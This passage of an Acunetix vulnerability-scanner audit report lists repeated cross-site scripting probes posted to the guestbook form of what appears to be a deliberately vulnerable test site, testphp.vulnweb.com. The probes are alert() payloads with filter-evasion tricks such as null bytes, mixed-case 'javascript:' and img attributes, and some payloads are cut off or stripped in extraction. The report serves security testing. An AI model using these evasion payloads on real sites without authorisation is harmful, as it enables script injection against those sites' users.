http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%00"'>alert(469355921680)%3B&submit=add%20m essage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Acunetix Website Audit

41

Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=
alert(469325921680)%3B&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 129 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 118 Cookie: mycookie=3 Connection: Close Acunetix Website Audit

42

Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=< Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28469205921619%29%3B%22%3E&subm it=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 82 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=<%00script>alert(469165921619)%3B&submit=add%20message Response Acunetix Website Audit

43

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 162 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 109 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text= &submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

44

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=
alert(469745922033)%3B&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 140 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

45

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 94 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 73 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

46

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469535921909)%3B&sub Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 126 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 119 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28469575921909%2 9%3B%22%3E&submit=add%20message Response Acunetix Website Audit

47

HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 96 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469495921909)%3B&submit=add%2 0message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=alert(469525921909)%3B&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

48

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 117 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=< /ScRiPt>&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request Acunetix Website Audit

49

POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 170 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 81 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

50

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=>'>alert(469505921909)%3B&submit=a Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 112 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28469625921970%29%3B%22 %3E&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 137 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Acunetix Website Audit

51

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 148 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 102 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=%00"'>alert(469775922033)%3B&submit =add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 Acunetix Website Audit

52

/guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=<%00script>alert(469585921970)%3B&submit=add%20messa ge Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=-->alert(469545921909)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Acunetix Website Audit

53

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 116 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=email@somealert(469555921909)%3Bdo Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 84 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 86 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

54

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 99 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=anonymous%20user&text=>">alert(469515921909)%3B&submit=ad d%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 91 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=Acunetix&text=>">alert(469095921556)%3B&submit=add%20mess age Response HTTP/1.1 200 OK Server: nginx/1.4.1 Acunetix Website Audit

55

Date: Mon, 21 Aug 2017 08:42:45 GMT Content-Type: text/html Connection: close /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 107 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28468065920807%29%3B%22%3E&s ubmit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 78 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=<%00script>alert(468305920991)%3B&submit=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Acunetix Website Audit

56

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 92 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=alert(468025920807)%3B&submit=add%20mes sage Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 104 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=email@somealert(468045920807)%3Bdomain.com&subm it=add%20message Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details Request POST /guestbook.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 90 Acunetix Website Audit

57

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm name=test&text=&submit=add%20mess Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:42:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /guestbook.php Details

